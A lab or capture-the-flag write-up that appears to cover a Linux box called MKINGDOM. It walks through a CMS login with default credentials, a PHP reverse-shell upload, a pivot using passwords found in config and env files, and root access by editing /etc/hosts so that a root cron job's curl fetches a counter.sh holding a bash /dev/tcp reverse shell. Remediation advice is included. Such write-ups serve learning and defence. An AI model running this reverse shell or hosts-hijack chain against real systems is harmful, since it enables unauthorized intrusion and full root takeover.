Case file

CMS upload RCE, credential pivots, and hosts-file curl hijack

Foundations Linux engagement: castle CMS on port 85 accepted a PHP upload after allowlisting; database and env secrets pivoted toad→mario; rewriting /etc/hosts hijacked a root curl of counter.sh for a reverse shell.

Foundations28 minLinux · CMS · Web · Privilege Escalation
  • Default CMS credentials and a loosened upload allowlist yielded www-data. toad and mario passwords from config/env enabled lateral movement; root’s scheduled curl trusted mkingdom.thm, which we pointed at our listener.

  • admin/password authenticated; allowing php uploads and triggering the shell caught www-data.

  • database.php and a base64 env token unlocked toad then mario.

  • Pointed mkingdom.thm at the attacker, served counter.sh with a reverse shell, and caught root.

01

Engagement summary

Default CMS credentials and a loosened upload allowlist yielded www-data. toad and mario passwords from config/env enabled lateral movement; root’s scheduled curl trusted mkingdom.thm, which we pointed at our listener.

MKINGDOM (10.48.134.165) exposed only Apache on port 85. /app/castle was a Concrete5-style CMS with admin/password. File Settings allowed php uploads; a reverse shell landed as www-data. database.php held toad:toadisthebest; an environment token base64-decoded to ikaTeNTANtES for mario. pspy showed root curling http://mkingdom.thm:85/app/castle/application/counter.sh. Editing /etc/hosts to our attacker IP and serving a malicious counter.sh on port 85 returned a root reverse shell when the job fired.

Business impact

Default CMS passwords and PHP upload allowlists are RCE. Secrets in web configs enable lateral movement. Root jobs that curl hostnames resolvable via user-writable /etc/hosts are remote root. Enforce strong CMS auth, block executable uploads, and pin root fetch URLs to IPs or signed internal endpoints.

02

Castle CMS upload RCE

admin/password authenticated; allowing php uploads and triggering the shell caught www-data.

OPERATOR · CMS

savvy@lab:~$ nmap -sV 10.48.134.165

85/tcp open http Apache httpd 2.4.7

savvy@lab:~$ dirsearch -u http://10.48.134.165:85

/app/castle

# login admin/password → File Settings allow php → upload reverse shell

savvy@lab:~$ nc -lnvp 1234

savvy@lab:/var/www/html$

03

toad and mario credential pivots

database.php and a base64 env token unlocked toad then mario.

OPERATOR · LATERAL

savvy@lab:~$ grep -E 'user|pass' /var/www/html/app/castle/application/config/database.php

toad / toadisthebest

savvy@lab:~$ su toad

savvy@lab:~$ echo aWthVGVOVEFOdEVTCg== | base64 -d

ikaTeNTANtES

savvy@lab:~$ su mario

savvy@lab:~$

04

Hosts hijack of root curl

Pointed mkingdom.thm at the attacker, served counter.sh with a reverse shell, and caught root.

PAYLOAD

counter.sh

#!/bin/bash
bash -i >& /dev/tcp/OPERATOR_IP/4444 0>&1

OPERATOR · ROOT

# pspy: root curl mkingdom.thm:85/.../counter.sh

savvy@lab:~$ # edit /etc/hosts: mkingdom.thm → OPERATOR_IP

savvy@lab:~$ sudo python3 -m http.server 85

savvy@lab:~$ nc -lnvp 4444

root@lab:~# id

uid=0(root) gid=0(root) groups=0(root)

Remediation

Rotate CMS and OS passwords; disable PHP uploads. Make /etc/hosts immutable for unprivileged users or use a managed resolver. Fetch automation scripts over authenticated channels with integrity checks.